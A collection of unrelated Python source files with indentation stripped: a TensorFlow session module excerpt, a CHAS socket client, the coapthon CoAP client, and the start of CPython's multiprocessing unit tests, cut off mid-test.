def _prun_fn(handle, feed_dict, fetch_list):
if target_list:
raise RuntimeError('partial_run() requires empty target_list.')
return self._call_tf_sessionprun(handle, feed_dict, fetch_list)
if handle is None:
return self._do_call(_run_fn, feeds, fetches, targets, options,
run_metadata)
else:
return self._do_call(_prun_fn, handle, feeds, fetches)
def _do_call(self, fn, *args):
try:
return fn(*args)
except errors.OpError as e:
message = compat.as_text(e.message)
m = BaseSession._NODEDEF_NAME_RE.search(message)
node_def = None
op = None
if m is not None:
node_name = m.group(3)
try:
op = self._graph.get_operation_by_name(node_name)
node_def = op.node_def
except KeyError:
pass
message = error_interpolation.interpolate(message, self._graph)
if 'only supports NHWC tensor format' in message:
message += ('\nA possible workaround: Try disabling Grappler optimizer'
'\nby modifying the config for creating the session eg.'
'\nsession_config.graph_options.rewrite_options.'
'disable_meta_optimizer = True')
raise type(e)(node_def, op, message)
def _extend_graph(self):
with self._graph._session_run_lock(): # pylint: disable=protected-access
tf_session.ExtendSession(self._session)
# The threshold to run garbage collection to delete dead tensors.
_DEAD_HANDLES_THRESHOLD = 10
def _register_dead_handle(self, handle):
# Register a dead handle in the session. Delete the dead tensors when
# the number of dead tensors exceeds a certain threshold.
tensors_to_delete = None
with self._delete_lock:
self._dead_handles.append(handle)
if len(self._dead_handles) == BaseSession._DEAD_HANDLES_THRESHOLD:
tensors_to_delete = self._dead_handles
self._dead_handles = []
# Delete the dead tensors.
if tensors_to_delete:
feeds = {}
fetches = []
for deleter_key, tensor_handle in enumerate(tensors_to_delete):
holder, deleter = session_ops._get_handle_deleter(
self.graph, deleter_key, tensor_handle)
feeds[holder] = tensor_handle
fetches.append(deleter)
self.run(fetches, feed_dict=feeds)
def _update_with_movers(self, feed_dict, feed_map):
# If a tensor handle is fed to a device-incompatible placeholder,
# we move the tensor to the right device, generate a new tensor handle,
# and update `feed_dict` to use the new handle.
handle_movers = []
for feed_name, val in feed_map.items():
mover = session_ops._get_handle_mover(self.graph, *val)
if mover:
handle_movers.append((feed_name, val[1], mover))
# Transfer a tensor to the right device if needed.
if not handle_movers:
return []
else:
feeds = {}
fetches = []
for _, handle, mover in handle_movers:
feeds[mover[0]] = handle
fetches.append(mover[1])
handles = self.run(fetches, feed_dict=feeds)
for handle_mover, handle in zip(handle_movers, handles):
np_val = np.array(handle.handle, dtype=np.object)
feed_name = handle_mover[0]
feed_tensor = feed_map[feed_name][0]
feed_dict[feed_tensor.experimental_ref()] = np_val
return handles
def _call_tf_sessionrun(self, options, feed_dict, fetch_list, target_list,
run_metadata):
return tf_session.TF_SessionRun_wrapper(self._session, options, feed_dict,
fetch_list, target_list,
run_metadata)
def _call_tf_sessionprun(self, handle, feed_dict, fetch_list):
return tf_session.TF_SessionPRun_wrapper(self._session, handle, feed_dict,
fetch_list)
# pylint: disable=protected-access
class _Callable(object):
"""Experimental wrapper for the C++ `Session::MakeCallable()` API."""
def __init__(self, session, callable_options):
self._session = session
self._handle = None
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(callable_options.SerializeToString()))
try:
self._handle = tf_session.TF_SessionMakeCallable(
session._session, options_ptr)
finally:
tf_session.TF_DeleteBuffer(options_ptr)
def __call__(self, *args, **kwargs):
# TODO(b/74355905): Support argument and return value nested structures,
# and tensor-like objects such as SparseTensors.
run_metadata = kwargs.get('run_metadata', None)
try:
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
ret = tf_session.TF_SessionRunCallable(self._session._session,
self._handle, args,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
return ret
def __del__(self):
# NOTE(mrry): It is possible that `self._session.__del__()` could be
# called before this destructor, in which case `self._session._session`
# will be `None`.
if (self._handle is not None and self._session._session is not None and
not self._session._closed):
tf_session.TF_SessionReleaseCallable(self._session._session,
self._handle)
# pylint: enable=protected-access
# TODO(b/74355905): Reimplement `Session.make_callable()` using this method
# where possible.
def _make_callable_from_options(self, callable_options):
"""Returns a handle to a "callable" with the given options.
Args:
callable_options: A `CallableOptions` protocol buffer message describing
the computation that will be performed by the callable.
Returns:
A handle to the new callable.
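A minimal sketch (assumes `x` is a placeholder and `y` a tensor in this
session's graph; `feed` and `fetch` are the standard repeated string fields
of `CallableOptions`):
```python
opts = config_pb2.CallableOptions()
opts.feed.append(x.name)
opts.fetch.append(y.name)
step_callable = sess._make_callable_from_options(opts)
```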
"""
self._extend_graph()
return BaseSession._Callable(self, callable_options)
@tf_export(v1=['Session'])
class Session(BaseSession):
"""A class for running TensorFlow operations.
A `Session` object encapsulates the environment in which `Operation`
objects are executed, and `Tensor` objects are evaluated. For
example:
```python
# Build a graph.
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# Launch the graph in a session.
sess = tf.compat.v1.Session()
# Evaluate the tensor `c`.
print(sess.run(c))
```
A session may own resources, such as
`tf.Variable`, `tf.queue.QueueBase`,
and `tf.compat.v1.ReaderBase`. It is important to release
these resources when they are no longer required. To do this, either
invoke the `tf.Session.close` method on the session, or use
the session as a context manager. The following two examples are
equivalent:
```python
# Using the `close()` method.
sess = tf.compat.v1.Session()
sess.run(...)
sess.close()
# Using the context manager.
with tf.compat.v1.Session() as sess:
sess.run(...)
```
The
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer exposes various configuration options for a
session. For example, to create a session that uses soft constraints
for device placement, and log the resulting placement decisions,
create a session as follows:
```python
# Launch the graph in a session that allows soft device placement and
# logs the placement decisions.
sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(
allow_soft_placement=True,
log_device_placement=True))
```
"""
def __init__(self, target='', graph=None, config=None):
"""Creates a new TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine. See
[Distributed TensorFlow](https://tensorflow.org/deploy/distributed) for
more examples.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional.) A
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer with configuration options for the session.
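For example, to launch an explicitly constructed graph (a minimal sketch):
```python
g = tf.Graph()
with g.as_default():
  c = tf.constant(30.0)
sess = tf.compat.v1.Session(graph=g)
print(sess.run(c))
```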
"""
super(Session, self).__init__(target, graph, config=config)
# NOTE(mrry): Create these on first `__enter__` to avoid a reference cycle.
self._default_graph_context_manager = None
self._default_session_context_manager = None
def __enter__(self):
if self._default_graph_context_manager is None:
self._default_graph_context_manager = self.graph.as_default()
else:
raise RuntimeError('Session context managers are not re-entrant. '
'Use `Session.as_default()` if you want to enter '
'a session multiple times.')
if self._default_session_context_manager is None:
self._default_session_context_manager = self.as_default()
self._default_graph_context_manager.__enter__()
return self._default_session_context_manager.__enter__()
def __exit__(self, exec_type, exec_value, exec_tb):
if exec_type is errors.OpError:
logging.error('Session closing due to OpError: %s', (exec_value,))
try:
self._default_session_context_manager.__exit__(exec_type, exec_value,
exec_tb)
except RuntimeError as error:
if error == exec_value:
# NOTE(skyewm): for some reason, in Python3,
# _default_session_context_manager.__exit__ will re-raise the "not
# re-entrant" exception raised in __enter__ above (note that if we're
# here, we're in the outer session context manager, since __exit__ is
# not called when __enter__ raises an exception). We still want to
# continue cleaning up this context manager before the exception is
# further propagated, so we ignore it here (note that it'll continue
# being propagated after this method completes).
pass
else:
raise
self._default_graph_context_manager.__exit__(exec_type, exec_value, exec_tb)
self._default_session_context_manager = None
self._default_graph_context_manager = None
# If we are closing due to an exception, set a time limit on our Close() to
# avoid blocking forever.
# TODO(b/120204635) remove this when deadlock is fixed.
if exec_type:
close_thread = threading.Thread(
name='SessionCloseThread', target=self.close)
close_thread.daemon = True
close_thread.start()
close_thread.join(30.0)
if close_thread.is_alive():
logging.error(
'Session failed to close after 30 seconds. Continuing after this '
'point may leave your program in an undefined state.')
else:
self.close()
@staticmethod
def reset(target, containers=None, config=None):
"""Resets resource containers on `target`, and close all connected sessions.
A resource container is distributed across all workers in the
same cluster as `target`. When a resource container on `target`
is reset, resources associated with that container will be cleared.
In particular, all Variables in the container will become undefined:
they lose their values and shapes.
NOTE:
(i) reset() is currently only implemented for distributed sessions.
(ii) Any sessions on the master named by `target` will be closed.
If no resource containers are provided, all containers are reset.
Args:
target: The execution engine to connect to.
containers: A list of resource container name strings, or `None` if all of
the containers are to be reset.
config: (Optional.) Protocol buffer with configuration options.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
resetting containers.
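For illustration (the target address and container name below are
hypothetical):
```python
tf.compat.v1.Session.reset('grpc://example-master:2222',
                           containers=['experiment0'])
```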
"""
if target is not None:
target = compat.as_bytes(target)
if containers is not None:
containers = [compat.as_bytes(c) for c in containers]
else:
containers = []
tf_session.TF_Reset(target, containers, config)
@tf_export(v1=['InteractiveSession'])
class InteractiveSession(BaseSession):
"""A TensorFlow `Session` for use in interactive contexts, such as a shell.
The only difference with a regular `Session` is that an `InteractiveSession`
installs itself as the default session on construction.
The methods `tf.Tensor.eval`
and `tf.Operation.run`
will use that session to run ops.
This is convenient in interactive shells and [IPython
notebooks](http://ipython.org), as it avoids having to pass an explicit
`Session` object to run ops.
For example:
```python
sess = tf.compat.v1.InteractiveSession()
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# We can just use 'c.eval()' without passing 'sess'
print(c.eval())
sess.close()
```
Note that a regular session installs itself as the default session when it
is created in a `with` statement. The common usage in non-interactive
programs is to follow that pattern:
```python
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
with tf.compat.v1.Session():
# We can also use 'c.eval()' here.
print(c.eval())
```
"""
_count_lock = threading.Lock()
_active_session_count = 0 # GUARDED_BY(_count_lock)
def __init__(self, target='', graph=None, config=None):
"""Creates a new interactive TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional) `ConfigProto` proto used to configure the session.
"""
if not config:
# If config is not provided, choose some reasonable defaults for
# interactive use:
#
# - Grow GPU memory as needed at the cost of fragmentation.
gpu_options = config_pb2.GPUOptions(allow_growth=True)
config = config_pb2.ConfigProto(gpu_options=gpu_options)
# Interactive sessions always place pruned graphs.
config.graph_options.place_pruned_graph = True
super(InteractiveSession, self).__init__(target, graph, config)
with InteractiveSession._count_lock:
if InteractiveSession._active_session_count > 0:
warnings.warn('An interactive session is already active. This can '
'cause out-of-memory errors in some cases. You must '
'explicitly call `InteractiveSession.close()` to release '
'resources held by the other session(s).')
InteractiveSession._active_session_count += 1
# NOTE(mrry): We do not use `Session._closed` here because it has unhelpful
# semantics (in particular, it is not set to true if `Session.close()` is
# called on a session that has not been "opened" by running a step) and we
# cannot change those semantics without breaking existing code.
self._explicitly_closed = False
self._default_session = self.as_default()
self._default_session.enforce_nesting = False
self._default_session.__enter__()
self._explicit_graph = graph
if self._explicit_graph is not None:
self._default_graph = graph.as_default()
self._default_graph.enforce_nesting = False
self._default_graph.__enter__()
def close(self):
"""Closes an `InteractiveSession`."""
super(InteractiveSession, self).close()
with InteractiveSession._count_lock:
if not self._explicitly_closed:
InteractiveSession._active_session_count -= 1
self._explicitly_closed = True
else:
return
if self._explicit_graph is not None:
self._default_graph.__exit__(None, None, None)
self._default_graph = None
self._default_session.__exit__(None, None, None)
self._default_session = None
|
socket_client.py
|
import selectors
import socket
import pkgutil
import inspect
import threading
from chaslib.socket_lib import CHASocket
class SocketClient:
def __init__(self, chas, host, port):
self.chas = chas # CHAS Instance
self.running = False # Value determining if the Socket Client is running
self.host = host # Hostname of the CHAS server
self.port = port # Port num of the CHAS server
self.sel = selectors.DefaultSelector()
self.sock = None # CHAS socket connected to the CHAS server
self.handlers = [] # List of ID handlers
self.thread = None # Threading object
def start(self):
# Function for starting the Socket Client
self.running = True
self.parse_handlers()
self.thread = threading.Thread(target=self._sc_event_loop)
self.thread.daemon = True
self.thread.start()
return
def stop(self):
self.running = False
self.thread.join()
def _start_connection(self):
addr = (self.host, self.port)
# print(f"Starting connection to {addr}")
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 10000)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 10000)
self.sock.connect_ex(addr)
self.sock.setblocking(False)
events = selectors.EVENT_READ
message = CHASocket(self.sel, self.sock, addr)
self.sel.register(self.sock, events, data=message)
message.write({'id': 1, 'uuid': None, 'content': None})
def _get_id(self, hand):
return hand.id_num
def parse_handlers(self):
# Function for parsing and loading ID Handlers
direct = [self.chas.settings.id_dir]
try:
for finder, name, _ in pkgutil.iter_modules(direct):
mod = finder.find_module(name).load_module(name)
for member in dir(mod):
obj = getattr(mod, member)
if inspect.isclass(obj):
for parent in obj.__bases__:
if parent.__name__ == 'IDHandle':
# Appending CHAS to handler
obj.chas = self.chas
self.handlers.append(obj())
except Exception:
# An error occurred while loading a handler; abort handler discovery
return
self.handlers.sort(key=self._get_id)
print(self.handlers)
return
def _sc_event_loop(self):
self._start_connection()
print("In socket server event loop...")
while self.running:
events = self.sel.select(timeout=1)
for key, mask in events:
message = key.data
try:
if mask & selectors.EVENT_READ:
data = message.read()
#print(message)
self.handler(data, message)
except Exception as e:
print(f"An error occurred: {e}")
message.close()
if not self.sel.get_map():
pass
def handler(self, data, sock):
uuid = data['uuid']
req_id = data['id']
content = data['content']
hand = self.handlers[req_id]
server = self.chas.server
if req_id == 1:
# Authenticating...
print("Sending to auth handler:")
hand.handel(sock, content)
return
hand.handel(server, content)
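# Example usage (illustrative only; `chas` is assumed to be a fully configured
# CHAS instance that provides `settings.id_dir` and `server`):
#
#     client = SocketClient(chas, 'localhost', 8080)
#     client.start()   # connects and handles incoming messages in a thread
#     ...
#     client.stop()    # stops the event loop and joins the thread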
|
coap.py
|
import logging.config
import random
import socket
import threading
import time
from coapthon import defines
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.messagelayer import MessageLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.requestlayer import RequestLayer
from coapthon.messages.message import Message
from coapthon.messages.request import Request
from coapthon.messages.response import Response
from coapthon.serializer import Serializer
__author__ = 'Giacomo Tanganelli'
logger = logging.getLogger(__name__)
class CoAP(object):
"""
Client class to perform requests to remote servers.
"""
def __init__(self, server, starting_mid, callback, sock=None, cb_ignore_read_exception=None, cb_ignore_write_exception=None):
"""
Initialize the client.
:param server: the (host, port) address of the remote server to send requests to
:param callback: the callback function to be invoked when a response is received
:param starting_mid: the initial message ID to use (useful for testing purposes)
:param sock: if a socket has been created externally, it can be used directly
:param cb_ignore_read_exception: Callback function to handle exception raised during the socket read operation
:param cb_ignore_write_exception: Callback function to handle exception raised during the socket write operation
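A minimal usage sketch (the host, port, MID and callback below are
assumptions for illustration, not part of this module):

    def on_response(response):
        print(response)

    client = CoAP(("example.org", 5683), random.randint(1, 65535), on_response)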
"""
self._currentMID = starting_mid
self._server = server
self._callback = callback
self._cb_ignore_read_exception = cb_ignore_read_exception
self._cb_ignore_write_exception = cb_ignore_write_exception
self.stopped = threading.Event()
self.to_be_stopped = []
self._messageLayer = MessageLayer(self._currentMID)
self._blockLayer = BlockLayer()
self._observeLayer = ObserveLayer()
self._requestLayer = RequestLayer(self)
addrinfo = socket.getaddrinfo(self._server[0], None)[0]
if sock is not None:
self._socket = sock
elif addrinfo[0] == socket.AF_INET:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._receiver_thread = None
def close(self):
"""
Stop the client.
"""
self.stopped.set()
for event in self.to_be_stopped:
event.set()
if self._receiver_thread is not None and self._receiver_thread.is_alive():
self._receiver_thread.join()
try:
# Python does not close the OS FD on socket.close()
# Ensure OS socket is closed with shutdown to prevent FD leak
self._socket.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
self._socket.close()
@property
def current_mid(self):
"""
Return the current MID.
:return: the current mid
"""
return self._currentMID
@current_mid.setter
def current_mid(self, c):
"""
Set the current MID.
:param c: the mid to set
"""
assert isinstance(c, int)
self._currentMID = c
def send_message(self, message):
"""
Prepare a message to send on the UDP socket. Set up retransmissions if needed.
:param message: the message to send
"""
if isinstance(message, Request):
request = self._requestLayer.send_request(message)
request = self._observeLayer.send_request(request)
request = self._blockLayer.send_request(request)
transaction = self._messageLayer.send_request(request)
self.send_datagram(transaction.request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
elif isinstance(message, Message):
message = self._observeLayer.send_empty(message)
message = self._messageLayer.send_empty(None, None, message)
self.send_datagram(message)
def end_observation(self, token):
"""
Remove an observation token from our records.
:param token: the token for the observation
"""
dummy = Message()
dummy.token = token
dummy.destination = self._server
self._observeLayer.remove_subscriber(dummy)
@staticmethod
def _wait_for_retransmit_thread(transaction):
"""
Only one retransmit thread at a time; wait for the other to finish.
"""
if hasattr(transaction, 'retransmit_thread'):
while transaction.retransmit_thread is not None:
logger.debug("Waiting for retransmit thread to finish ...")
time.sleep(0.01)
def _send_block_request(self, transaction):
"""
A former request resulted in a block-wise transfer. With this method, the block-wise transfer
will be continued, including triggering of the retry mechanism.
:param transaction: The former transaction including the request which should be continued.
"""
transaction = self._messageLayer.send_request(transaction.request)
# ... but don't forget to reset the acknowledge flag
transaction.request.acknowledged = False
self.send_datagram(transaction.request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
def send_datagram(self, message):
"""
Send a message over the UDP socket.
:param message: the message to send
"""
host, port = message.destination
logger.debug("send_datagram - " + str(message))
serializer = Serializer()
raw_message = serializer.serialize(message)
try:
self._socket.sendto(raw_message, (host, port))
except Exception as e:
if self._cb_ignore_write_exception is not None and callable(self._cb_ignore_write_exception):
if not self._cb_ignore_write_exception(e, self):
raise
if self._receiver_thread is None or not self._receiver_thread.is_alive():
self._receiver_thread = threading.Thread(target=self.receive_datagram)
self._receiver_thread.start()
def _start_retransmission(self, transaction, message):
"""
Start the retransmission task.
:type transaction: Transaction
:param transaction: the transaction that owns the message that needs retransmission
:type message: Message
:param message: the message that needs the retransmission task
"""
with transaction:
if message.type == defines.Types['CON']:
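# The first timeout is drawn uniformly from
# [ACK_TIMEOUT, ACK_TIMEOUT * ACK_RANDOM_FACTOR]; _retransmit() then doubles
# it after every attempt, up to MAX_RETRANSMIT retransmissions.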
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
transaction.retransmit_stop = threading.Event()
self.to_be_stopped.append(transaction.retransmit_stop)
transaction.retransmit_thread = threading.Thread(target=self._retransmit,
name=str('%s-Retry-%d' % (threading.current_thread().name, message.mid)),
args=(transaction, message, future_time, 0))
transaction.retransmit_thread.start()
def _retransmit(self, transaction, message, future_time, retransmit_count):
"""
Thread function to retransmit the message in the future
:param transaction: the transaction that owns the message that needs retransmission
:param message: the message that needs the retransmission task
:param future_time: the amount of time to wait before a new attempt
:param retransmit_count: the number of retransmissions
"""
with transaction:
logger.debug("retransmit loop ... enter")
while retransmit_count <= defines.MAX_RETRANSMIT \
and (not message.acknowledged and not message.rejected) \
and not transaction.retransmit_stop.is_set():
transaction.retransmit_stop.wait(timeout=future_time)
if not message.acknowledged and not message.rejected and not transaction.retransmit_stop.is_set():
retransmit_count += 1
future_time *= 2
if retransmit_count < defines.MAX_RETRANSMIT:
logger.debug("retransmit loop ... retransmit Request")
self.send_datagram(message)
if message.acknowledged or message.rejected:
message.timeouted = False
else:
logger.warning("Give up on message {message}".format(message=message.line_print))
message.timeouted = True
# Inform the user that nothing was received
self._callback(None)
try:
self.to_be_stopped.remove(transaction.retransmit_stop)
except ValueError:
pass
transaction.retransmit_stop = None
transaction.retransmit_thread = None
logger.debug("retransmit loop ... exit")
def receive_datagram(self):
"""
Receive datagram from the UDP socket and invoke the callback function.
"""
logger.debug("Start receiver Thread")
while not self.stopped.is_set():
self._socket.settimeout(0.1)
try:
datagram, addr = self._socket.recvfrom(1152)
except socket.timeout: # pragma: no cover
continue
except Exception as e: # pragma: no cover
if self._cb_ignore_read_exception is not None and callable(self._cb_ignore_read_exception):
if self._cb_ignore_read_exception(e, self):
continue
return
else: # pragma: no cover
if len(datagram) == 0:
logger.debug("Exiting receiver Thread due to orderly shutdown on server end")
return
serializer = Serializer()
try:
host, port = addr
except ValueError:
host, port, tmp1, tmp2 = addr
source = (host, port)
message = serializer.deserialize(datagram, source)
if isinstance(message, Response):
logger.debug("receive_datagram - " + str(message))
transaction, send_ack = self._messageLayer.receive_response(message)
if transaction is None: # pragma: no cover
continue
self._wait_for_retransmit_thread(transaction)
if send_ack:
self._send_ack(transaction)
self._blockLayer.receive_response(transaction)
if transaction.block_transfer:
self._send_block_request(transaction)
continue
elif transaction is None: # pragma: no cover
self._send_rst(transaction)
return
self._observeLayer.receive_response(transaction)
if transaction.notification: # pragma: no cover
ack = Message()
ack.type = defines.Types['ACK']
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
self._callback(transaction.response)
else:
self._callback(transaction.response)
elif isinstance(message, Message):
self._messageLayer.receive_empty(message)
logger.debug("Exiting receiver Thread due to request")
def _send_ack(self, transaction):
"""
Sends an ACK message for the response.
:param transaction: transaction that holds the response
"""
ack = Message()
ack.type = defines.Types['ACK']
if not transaction.response.acknowledged:
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
def _send_rst(self, transaction): # pragma: no cover
"""
Sends an RST message for the response.
:param transaction: transaction that holds the response
"""
rst = Message()
rst.type = defines.Types['RST']
if not transaction.response.acknowledged:
rst = self._messageLayer.send_empty(transaction, transaction.response, rst)
self.send_datagram(rst)
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import contextlib
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 30.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API as threading.Thread
# (join() and is_alive()), the support function can be reused.
support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
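# Example (illustrative): wrapping time.sleep records roughly the sleep
# duration in `elapsed`:
#
#     sleep = TimingWrapper(time.sleep)
#     sleep(0.1)
#     sleep.elapsed  # ~0.1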
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
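# Different semaphore implementations expose their counter differently: as a
# get_value() method, as a private __value attribute (name-mangled to
# _Semaphore__value), or as a plain _value attribute; try each in turn.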
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
